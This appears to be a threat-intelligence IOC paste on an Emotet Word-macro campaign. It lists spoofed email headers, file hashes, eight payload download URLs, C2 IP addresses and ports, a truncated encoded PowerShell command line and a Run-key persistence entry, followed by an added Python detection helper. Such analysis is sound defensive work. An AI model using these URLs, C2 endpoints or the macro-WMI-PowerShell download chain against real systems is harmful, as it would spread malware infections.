- #IOC #OptiData #VR #emotet #W97M #macro #WMI #powershell
- https://pastebin.com/cNb8XhX1
- previous_contact:
- https://pastebin.com/1XfkVE5e
- https://pastebin.com/F520pqQW
- FAQ:
- attack_vector
- --------------
- email attachment .doc > macro > WMI > powershell -enc > GET from one of 8 URLs > \Users\%name%\*.exe > moved to C:\Users\%name%\AppData\Local\*\*.exe
- email_headers
- --------------
- Received: from ns.shimizuya.co.jp (ns.shimizuya.co.jp [210.143.104.170])
- Received: from [197.221.251.9] (unknown [197.221.251.9])
- by ns.shimizuya.co.jp (Postfix) with ESMTPA id 13DFA63586
- Date: Thu, 22 Oct 2020 14:40:57 +0200
- From: "spoofed_email" <kikaku-toyopridea@shimizuya.co.jp>
- To: victim@org.com
- Subject: FW: Надсилання: 1_16_41124-20(09.10.20), Концепція розвитку, Пояснювальна записка, Розпорядження(проект)
- files
- --------------
- SHA-256 4008f8c88281fb6c543244f1701fb930aa6d1411a3209fcaa2997ee26f977d80
- File name PO6556850371IW.doc
- File size 178.00 KB (182272 bytes)
- SHA-256 125411ad0784ac4750a1205b97e6a20c905baf5c117a27c4b417590494d80b11
- File name RMActivate_isv.exe
- File size 368.00 KB (376832 bytes)
- activity
- --------------
- PL_SCR
- http://launch.tactikafacewear.com/wp-content/Uk
- paasologrp.com/parseopmlo/5
- singohotel.com/dashboardl/Pq
- mymathlabhomework.com/wp-content/Po
- https://dietherbsindia.com/assets/k8oo
- dev-tech.eu/demoshop/P0
- mithraa.co/nMT
- chess-pgn.com/win-raid/Pl6T5
- C2
- 200.116.145.225:443
- 5.196.108.185:8080
- 167.114.153.111:8080
- netwrk
- --------------
- launch.tactikafacewear.com GET /wp-content/Uk/ HTTP/1.1
- 200.116.145.225:443 POST /hCnHn8M/... HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0
- 5.196.108.185:8080 POST /rWnUmnc/... HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0
- 167.114.153.111:8080 POST /dQok/1r/... HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0
- 167.99.105.11:8080 POST /i8Elp07/... HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0
- comp
- --------------
- powershell.exe 170.10.164.154 443
- powershell.exe 3.10.134.94 80
- RMActivate_isv.exe 200.116.145.225 443
- RMActivate_isv.exe 5.196.108.185 8080
- RMActivate_isv.exe 167.114.153.111 8080
- RMActivate_isv.exe 212.42.75.240 993
- RMActivate_isv.exe 167.99.105.11 8080
- proc
- --------------
- "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
- [another]
- C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
- C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe -ENCOD IAAkAGoAQwBGAFYAUABiACAAIAA9AFsAVABZAFAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADUAf
- C:\Users\operator\Qyj9bw1\A5vuovn\Rcrtkr.exe - moved
- C:\Users\operator\AppData\Local\appmgr\RMActivate_isv.exe
- persist
- --------------
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 22.10.2020 15:45
- RMActivate_isv EffectDemo MFC Application
- c:\users\operator\appdata\local\appmgr\rmactivate_isv.exe 23.10.2020 1:28
- drop
- --------------
- C:\Users\operator\Qyj9bw1\A5vuovn\Rcrtkr.exe
- C:\Users\operator\AppData\Local\appmgr\RMActivate_isv.exe
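Added example (not part of the paste or of OptiData's own tooling): a small Python triage helper that applies the chain summarised under attack_vector to constructed telemetry, flagging WmiPrvSE-spawned encoded PowerShell (proc), an HKCU Run value pointing into AppData\Local (persist) and connections to the listed C2 endpoints (comp). The event dict shape, the assumption that wmiprvse.exe is PowerShell's direct parent, and the sample events are assumptions made here, not data from the paste.

```python
import re

# Indicators taken from the paste above
C2_ENDPOINTS = {("200.116.145.225", 443), ("5.196.108.185", 8080),
                ("167.114.153.111", 8080), ("167.99.105.11", 8080)}
RUN_KEY = "hkcu\\software\\microsoft\\windows\\currentversion\\run"
# Runtime path shape from the paste: C:\Users\<name>\AppData\Local\<dir>\<file>.exe
LOCAL_APPDATA_EXE = re.compile(r"^c:\\users\\[^\\]+\\appdata\\local\\[^\\]+\\[^\\]+\.exe$", re.I)

def has_encoded_flag(cmd):
    """True if a switch is a prefix of -EncodedCommand (powershell accepts -enc, -ENCOD, ...)."""
    for tok in cmd.split():
        t = tok.lower()
        if t.startswith("-") and len(t) > 1 and "encodedcommand".startswith(t[1:]):
            return True
    return False

def triage(events):
    """Return (event_index, finding) for events matching the chain; event dicts are an assumed shape."""
    findings = []
    for i, ev in enumerate(events):
        kind = ev.get("type")
        if kind == "process":  # macro > WMI > powershell -enc hop (assumes wmiprvse.exe is the parent)
            parent = ev.get("parent_image", "").lower()
            image = ev.get("image", "").lower()
            if (parent.endswith("\\wmiprvse.exe") and image.endswith("\\powershell.exe")
                    and has_encoded_flag(ev.get("command_line", ""))):
                findings.append((i, "wmi_spawned_encoded_powershell"))
        elif kind == "registry":  # HKCU Run value pointing into AppData\Local
            if (ev.get("key", "").lower().startswith(RUN_KEY)
                    and LOCAL_APPDATA_EXE.match(ev.get("value", "").strip('"'))):
                findings.append((i, "run_key_localappdata_exe"))
        elif kind == "network":  # C2 endpoints from the comp / netwrk sections
            if (ev.get("dst_ip"), ev.get("dst_port")) in C2_ENDPOINTS:
                findings.append((i, "known_c2_endpoint"))
    return findings

# Constructed sample events mirroring the proc / persist / comp sections (not real logs)
SAMPLE_EVENTS = [
    {"type": "process", "parent_image": r"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE",
     "image": r"C:\Windows\system32\wbem\wmiprvse.exe", "command_line": "wmiprvse.exe -secured -Embedding"},
    {"type": "process", "parent_image": r"C:\Windows\system32\wbem\wmiprvse.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe",
     "command_line": "POwersheLL.exe -ENCOD IAAkAGoAQwBGAFYAUABiACAAIAA9AFsAVABZAFAAZQBd"},
    {"type": "registry", "key": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "value": r"c:\users\operator\appdata\local\appmgr\rmactivate_isv.exe"},
    {"type": "network", "image": "RMActivate_isv.exe", "dst_ip": "200.116.145.225", "dst_port": 443},
    {"type": "network", "image": "browser.exe", "dst_ip": "192.0.2.10", "dst_port": 443},  # benign
]
```

Running `triage(SAMPLE_EVENTS)` yields one finding per stage of the chain (events 1, 2 and 3) and nothing for the benign connection.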
- # # #
- https://www.virustotal.com/gui/file/4008f8c88281fb6c543244f1701fb930aa6d1411a3209fcaa2997ee26f977d80/details
- https://www.virustotal.com/gui/file/125411ad0784ac4750a1205b97e6a20c905baf5c117a27c4b417590494d80b11/details
- https://analyze.intezer.com/analyses/10b857fe-3d77-4c66-a92b-46fb82549676
- VR